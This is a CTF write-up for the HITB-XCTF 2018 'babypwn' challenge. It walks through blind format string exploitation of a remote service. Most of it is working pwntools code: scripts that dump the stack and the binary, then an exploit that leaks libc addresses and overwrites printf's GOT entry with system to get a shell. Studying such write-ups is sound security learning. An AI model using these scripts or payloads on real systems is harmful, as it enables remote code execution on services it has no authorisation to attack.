HITB-XCTF GSEC 2018 Quals: babypwn - Blind Format String Exploitation

By David Buchanan, 13^th April 2018

The only information provided with this challenge was an IP address and port number. No binaries to download! Of course, my first idea was to use netcat to see what it did.

$ nc 47.75.182.113 9999
hello
hello
%08x
00000000

Typing hello just resulted in the same input being echoed back. There's only a limited number of possibilities for this kind of challenge, so I thought I'd check if format strings did anything. I entered %08x, and sure enough the server responded with 00000000, demonstrating that the server was passing user input to printf or a similar function.

Next, I performed some recon. I wrote a simple script to dump the contents of the stack.

from pwn import *

chal = remote("47.75.182.113", 9999)

for i in range(1, 512):
    chal.sendline("%{}$016lx".format(i))
    print chal.recvn(16)

Here's a shortened version of the output from two consecutive runs, side by side, along with some annotations I added:

First run:          Second run:

0000000000000000    0000000000000000
0000000000000000    0000000000000000
00007f40930892f0    00007f34706a42f0 <- libc pointer
00007f4093383780    00007f347099e780
00007f40935aa700    00007f3470bc5700
786c363130243625    786c363130243625 <- My format string input
00007fff9e520000    00007ffce58bb700
0000000000000000    0000000000000000
00007fff9e520080    00007ffce58bb720
000000006562b026    000000006562b026
00007f4093149627    00007f3470764627
00000000ffffffff    00000000ffffffff
00007f40935ae718    00007f3470bc9718
00007fff9e595280    00007ffce591a280
00007f40935ae700    00007f3470bc9700
00007fff9e520001    00007ffce58bb701
000108882879431a    0001094ab0b7ba64
0000000000000000    0000000000000000
0000000000000000    0000000000000000
0000000000000000    0000000000000000
0000000000000000    0000000000000000
0000000000000000    0000000000000000
0000000000000000    0000000000000000
00007fff9e520258    00007ffce58bb8f8
0000000000000000    0000000000000000
0000000000000001    0000000000000001
00007fff9e520258    00007ffce58bb8f8
0000000000000001    0000000000000001
00007fff9e520180    00007ffce58bb820
00007f40935ae168    00007f3470bc9168
0000000000f0b5ff    0000000000f0b5ff
0000000000000001    0000000000000001
000000000040076d    000000000040076d <- A return address that points into
00007fff9e52015e    00007ffce58bb7fe    the .text segment of the program
0000000000000000    0000000000000000    (presumably)
0000000000400720    0000000000400720
00000000004005a0    00000000004005a0

From this we can gather that the program is likely dynamically linked with libc, ASLR is on (the libc addresses are different each time), but PIE is off (the .text segment addresses are the same each time).

The .text segment likely starts at 0x400000.

With this information in mind, I wrote a script to dump the program code:

from pwn import *

chal = remote("47.75.182.113", 9999)

base = 0x400000
leaked = ""

while 1:
    addr = p64(base+len(leaked))
    if "\n" in addr:
        leaked += "\0"
        print("derp")
        continue
    chal.sendline("A"*6 + "%8$s" + "B"*6 + addr)
    chal.recvuntil("A"*6)
    leak = chal.recvuntil("B"*6)[:-6]
    leaked += leak + "\0"
    print(leak)
    l = open("leak.bin", "wb")
    l.write(leaked)
    l.close()

Part of the script skips any addresses containing "\n", otherwise my dump would fail, because the server appeared to be using it to delimit lines of input. I left this program running for a couple of minutes, and dumped the first ~2kb of the .text segment.

I loaded this dump up in IDA and took a look.

Although the symbol table was part of the data I dumped, it wasn't enough for IDA to import automatically, so I had to name things myself.

The program sits in a loop, reading input onto the stack and printf'ing it. Although gets() smashes the stack, the program never returns so it isn't exploitable.

I decided that the easiest path to exploitation is to replace printf in the GOT with a pointer to system, effectively converting the program into a system(gets()) loop. But first, I need to find the address of printf's GOT entry, which is easy because we can just look at the PLT in IDA:

Next, we need to work out where system is. To do this, I used format strings to leak the GOT entries for a few different function calls (See my final exploit code below), and then fed the information into https://libc.blukat.me/ (A very useful tool!). This revealed that the libc version being used by the server was libc6_2.23-0ubuntu10_amd64.so.

Then all I had to do was write a quick format string generator, and there you have it:

from pwn import *

libc = ELF("libc6_2.23-0ubuntu10_amd64.so")

# derived from leaked .text section
got_setbuf = 0x601018
got_printf = 0x601020
got_gets   = 0x601028
got_usleep = 0x601030

chal = remote("47.75.182.113", 9999)

def leak_addr(addr):
    print("Leaking...")
    chal.sendline("%8$s" + "\0"*12 + p64(addr))
    return u64(chal.recvn(6) + "\0\0")

libc_setbuf = leak_addr(got_setbuf)
libc_gets = leak_addr(got_gets)
libc_usleep = leak_addr(got_usleep)

log.info("libc_setbuf = " + hex(libc_setbuf))
log.info("libc_gets   = " + hex(libc_gets))
log.info("libc_usleep = " + hex(libc_usleep))

# calculate libc base address (ASLR)
libc.address = libc_setbuf - libc.sym["setbuf"]

log.info("libc base   = " + hex(libc.address))

# double check we have the correct libc version
assert(libc.sym["gets"] == libc_gets)
assert(libc.sym["usleep"] == libc_usleep)

# now we will overwrite got_printf with libc.sym["system"]

nwritten = 0
payload = ""
addrs = ""
offset = 16
for index, byte in enumerate(bytearray(p64(libc.sym["system"])[:6])):
    addrs += p64(got_printf+index)
    num_needed = ((byte - nwritten - 16) & 0xFF) + 16
    payload += "%1${}x%{}$hhn".format(num_needed, 6+offset+index)
    nwritten += num_needed

assert(len(payload) <= offset*8)

payload += "\0"*((offset*8)-len(payload))
payload += addrs

assert("\n" not in payload)

chal.sendline(payload)
chal.sendline("/bin/sh")

chal.interactive()

Although pwntools does have it's own format string generator, I couldn't get it to work ¯\(ツ)/¯.

The flag was HITB{Baby_Pwn_BabY_bl1nd}

Finally, I dumped the program binary, so now you can run it offline: babypwn

A quick note on how the format string exploit works:

According to man 3 printf, the %n formatter means

"The number of characters written so far is stored into the integer pointed to by the corresponding argument."

We can abuse this by putting arbitrary pointers on the stack, printing a controlled number of bytes, and then using a %n to get an arbitrary write. If you want a more detailed explanation, google it :P